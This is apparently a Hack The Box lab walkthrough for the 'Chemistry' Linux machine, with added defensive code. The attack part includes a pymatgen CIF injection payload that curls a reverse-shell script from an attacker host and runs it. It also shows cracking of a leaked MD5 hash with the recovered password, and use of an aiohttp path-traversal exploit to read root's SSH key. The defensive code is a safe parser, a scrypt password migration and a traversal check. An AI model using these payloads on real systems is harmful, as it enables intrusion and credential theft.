> m4rt@CTF_ARCHIVE:~$


Hack The Box / LINUX / 2026-03-27

Hack The Box — Chemistry (Linux)

Initial access through a Pymatgen CIF parser RCE, lateral move to user rosa, then root via an aiohttp path traversal vulnerability.

Target

  • IP: 10.129.203.194

Recon

sudo nmap -sC -sV 10.129.203.194 -p- -T5 -v
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Sat, 19 Oct 2024 21:08:41 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to http://10.129.203.194:5000/. From the Server header, we can see the site is built with Werkzeug/3.0.3 Python/3.9.5. Register with any username and password.

We can upload a CIF file. The site lets us download a sample file. There is a vulnerability with a public exploit:

  • https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f

See the attached file attachments/rev.py, which contains a Python reverse shell.

Start a netcat listener and a Python web server:

nc -vlnp 4444
python3 -m http.server 80

Upload example.cif, intercept the request with Burp, and send it to Repeater.

Change the file content to:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.16.26/rev.py -o /dev/shm/rev.py");0,0,0'

Send the request, then view example.cif on the website: parsing the file runs the payload and fetches rev.py from our web server.

Then change the payload to:

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("python3 /dev/shm/rev.py");0,0,0'

Send the request again. On the site, view example.cif again. We get a reverse shell as user app.
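The root cause behind the advisory above is that the parser evaluated the value of the transform field as Python instead of parsing it. The following is an added example (my own code, not pymatgen's and not from the write-up): a strict grammar-based parser for the "P;p" transformation string, plus a scanner that flags CIF files whose transform fields fall outside that grammar. The two sample CIFs are constructed here; the field names are the ones the payload uses.

```python
import re
from fractions import Fraction

# CIF fields whose value the parser interprets as a Jones-Faithful
# transformation string of the form "P;p", e.g. "a,b,c;0,0,0".
TRANSFORM_FIELDS = (
    "_space_group_magn.transform_BNS_Pp_abc",
    "_space_group_magn.transform_OG_Pp_abc",
)

# One signed term: optional coefficient (integer or fraction), optional axis.
_TERM = re.compile(r"^([+-]?)(\d+(?:/\d+)?)?([abc])?$")


def _parse_linear(expr):
    """Parse one component such as 'a', '-b', '1/2c' or 'a+b-1/2' into
    (coefficients of a, b, c, constant). Anything outside this grammar
    raises ValueError; nothing is ever evaluated."""
    clean = expr.replace(" ", "")
    tokens = re.findall(r"[+-]?[^+-]+", clean)
    if not tokens or "".join(tokens) != clean:
        raise ValueError(f"bad component: {expr!r}")
    coeffs = [Fraction(0)] * 3
    const = Fraction(0)
    for tok in tokens:
        m = _TERM.match(tok)
        if not m or not (m.group(2) or m.group(3)):
            raise ValueError(f"bad term: {tok!r}")
        sign, num, axis = m.groups()
        value = Fraction(num) if num else Fraction(1)
        if sign == "-":
            value = -value
        if axis:
            coeffs["abc".index(axis)] += value
        else:
            const += value
    return coeffs, const


def parse_transformation(text):
    """Parse 'P;p' into a 3x3 matrix and a 3-vector of Fractions.
    This is a safe replacement for eval()-style handling of the string."""
    p_part, _, t_part = text.partition(";")
    t_part = t_part or "0,0,0"
    comps = p_part.split(",")
    if len(comps) != 3:
        raise ValueError("linear part needs exactly three components")
    rows = []
    for comp in comps:
        coeffs, const = _parse_linear(comp)
        if const != 0:
            raise ValueError(f"constant in linear part: {comp!r}")
        rows.append(coeffs)
    shifts = t_part.split(",")
    if len(shifts) != 3:
        raise ValueError("origin shift needs exactly three components")
    vec = []
    for shift in shifts:
        coeffs, const = _parse_linear(shift)
        if any(coeffs):
            raise ValueError(f"axis in origin shift: {shift!r}")
        vec.append(const)
    return rows, vec


def scan_cif(cif_text):
    """Return (lineno, field, reason) for every transform field whose value
    does not fit the grammar. Useful as an upload-time check or a hunt over
    stored CIF files."""
    findings = []
    for lineno, line in enumerate(cif_text.splitlines(), 1):
        stripped = line.strip()
        for field in TRANSFORM_FIELDS:
            rest = stripped[len(field):]
            if stripped.startswith(field) and (not rest or rest[0].isspace()):
                value = rest.strip().strip("'\"")
                try:
                    parse_transformation(value)
                except ValueError as err:
                    findings.append((lineno, field, str(err)))
    return findings


# Constructed samples (not the page's files): a well-formed field, and one
# carrying a Python expression where only something like 'a,b,c;0,0,0' belongs.
BENIGN_CIF = """\
data_benign
_space_group_magn.transform_BNS_Pp_abc  '-b,a,c;0,0,1/2'
"""
INJECTED_CIF = """\
data_suspicious
_space_group_magn.transform_BNS_Pp_abc  'a,b,[x for x in ().__class__.__mro__];0,0,0'
"""

if __name__ == "__main__":
    print(parse_transformation("-b,a,c;0,0,1/2"))
    print(scan_cif(BENIGN_CIF))
    print(scan_cif(INJECTED_CIF))
```

The grammar only admits signed integer or fractional coefficients on a, b, c and numeric origin shifts, so any attribute access, call or bracket is rejected before anything reaches an interpreter.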

python3 -c 'import pty;pty.spawn("/bin/bash")'
# CTRL-Z
stty raw -echo
fg
cat /etc/passwd

From this output, we notice user rosa.

cat app.py

We notice a hardcoded secret:

app.config['SECRET_KEY'] = 'MyS3cretCh3mistry4PP'

Open the SQLite database and dump the user table:

sqlite3 instance/database.db
select * from user;
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5

Put the hash in a hash file and crack it:

hashcat -a 0 -m 0 ./hash ./rockyou.txt

We get password unicorniosrosados.

ssh rosa@10.129.203.194

Enter the recovered password.
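The hash cracks in seconds because the table stores an unsalted 32-character digest, one fast MD5 per guess. As an added example (my own code, not the box's app.py), here is the stored-password scheme a defender would move that table to, with a migrate-on-login step so existing rows get rehashed the next time each user authenticates. The user record and password are constructed for the demo.

```python
import hashlib
import hmac
import os

# scrypt cost: 2**14 iterations, r=8, p=1 (about 16 MB per hash).
SCRYPT_LOG_N, SCRYPT_R, SCRYPT_P = 14, 8, 1


def legacy_md5_hash(password):
    """The unsalted scheme the cracked table implies: one fast digest per guess."""
    return hashlib.md5(password.encode()).hexdigest()


def is_legacy_hash(stored):
    """True for a bare 32-hex-char MD5 digest, i.e. a row not yet migrated."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())


def hash_password(password, salt=None):
    """Salted scrypt, encoded with its parameters so they can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=1 << SCRYPT_LOG_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_LOG_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored parameters and compare in constant time."""
    try:
        scheme, log_n, r, p, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=1 << int(log_n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest.hex(), digest_hex)


def login_and_migrate(record, password):
    """Authenticate against a user row (dict with a 'password' field).
    A legacy MD5 row is verified once, then replaced in place with scrypt."""
    stored = record["password"]
    if is_legacy_hash(stored):
        if not hmac.compare_digest(legacy_md5_hash(password), stored.lower()):
            return False
        record["password"] = hash_password(password)
        return True
    return verify_password(password, stored)


if __name__ == "__main__":
    # Constructed sample row, not a user from the box.
    user = {"username": "demo", "password": legacy_md5_hash("hunter2")}
    print(login_and_migrate(user, "hunter2"), user["password"][:20])
```

The migration keeps login working for every existing row while removing the cheap-to-crack digests one user at a time; a row that never logs in again can be force-reset or expired.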

ps aux

We notice a root-owned web app:

root        1040  0.0  1.3  35524 27552 ?        Ss   07:20   0:00 /usr/bin/python3.9 /opt/monitoring_site/app.py

Check what it listens on:

rosa@chemistry:~$ ss -ltpn
State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process
LISTEN       0             4096                 127.0.0.53%lo:53                      0.0.0.0:*
LISTEN       0             128                        0.0.0.0:22                      0.0.0.0:*
LISTEN       0             128                        0.0.0.0:5000                    0.0.0.0:*
LISTEN       0             128                      127.0.0.1:8080                    0.0.0.0:*
LISTEN       0             128                           [::]:22                         [::]:*

Tunnel port 8080:

ssh rosa@10.129.203.194 -NL 5555:localhost:8080

Go to http://localhost:5555/. From HTTP response headers we notice:

Server: Python/3.9 aiohttp/3.9.1

There is a vulnerability with a PoC:

  • https://github.com/z3rObyte/CVE-2024-23334-PoC

git clone https://github.com/z3rObyte/CVE-2024-23334-PoC.git

Edit exploit.sh like this:

url="http://localhost:5555"
payload="/assets/"

Run it:

bash exploit.sh

We obtain /etc/passwd. Change the target file to root/.ssh/id_rsa and run again:

bash exploit.sh

We obtain root's private key. Save it to root_key and set permissions:

chmod 600 root_key
ssh root@10.129.203.194 -i root_key

We get a shell as root.
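CVE-2024-23334 is a path traversal in aiohttp's static file handler: with follow_symlinks=True on a static route, releases before 3.9.2 skipped the check that the resolved file still lies inside the served directory, which is why ../ sequences under /assets/ reach /etc/passwd and /root/.ssh/id_rsa. As an added example (my own stand-alone code, not aiohttp's and not the monitoring app's source), the block below models the containment check a static handler needs, exercises it against plain, URL-encoded and symlink escapes in a temporary directory, and includes a small audit that finds add_static(..., follow_symlinks=True) calls in Python source. SAMPLE_APP is a constructed source file, not the box's app.py.

```python
import ast
import tempfile
from pathlib import Path
from urllib.parse import unquote


def contained_static_path(root, request_path):
    """Map a request path under a static route to a file inside root.
    Returns None when the fully resolved target (symlinks followed, '..'
    collapsed) leaves root; otherwise the resolved Path."""
    root = Path(root).resolve()
    rel = unquote(request_path).lstrip("/")
    target = (root / rel).resolve()
    try:
        target.relative_to(root)
    except ValueError:
        return None
    return target


def find_follow_symlinks(source):
    """Line numbers of add_static(...) calls that pass follow_symlinks=True,
    the setting that enabled the traversal in affected aiohttp versions."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "add_static"):
            for kw in node.keywords:
                if (kw.arg == "follow_symlinks"
                        and isinstance(kw.value, ast.Constant) and kw.value.value is True):
                    findings.append(node.lineno)
    return findings


# Constructed sample application source for the audit above.
SAMPLE_APP = '''\
from aiohttp import web
app = web.Application()
app.router.add_static("/assets/", "static/", follow_symlinks=True)
app.router.add_static("/css/", "css/")
'''


def demo():
    """Build a throwaway static root with a file, a sibling secret outside the
    root and a symlink pointing at it, then check each request shape."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "static")
        root.mkdir()
        (root / "app.js").write_text("// ok")
        secret = Path(tmp, "secret.txt")
        secret.write_text("outside the static root")
        (root / "link").symlink_to(secret)
        return {
            "normal": contained_static_path(root, "/app.js") is not None,
            "dotdot": contained_static_path(root, "/../secret.txt") is None,
            "encoded": contained_static_path(root, "/%2e%2e/secret.txt") is None,
            "symlink": contained_static_path(root, "/link") is None,
        }


if __name__ == "__main__":
    print(demo())
    print("follow_symlinks=True at lines:", find_follow_symlinks(SAMPLE_APP))
```

Resolving the target before the relative_to check is what closes all three escapes at once; checking the unresolved string, or skipping the check when symlinks are followed, is the behaviour the PoC relies on. The practical fixes are to upgrade aiohttp and to drop follow_symlinks=True unless the link targets are themselves inside the served directory.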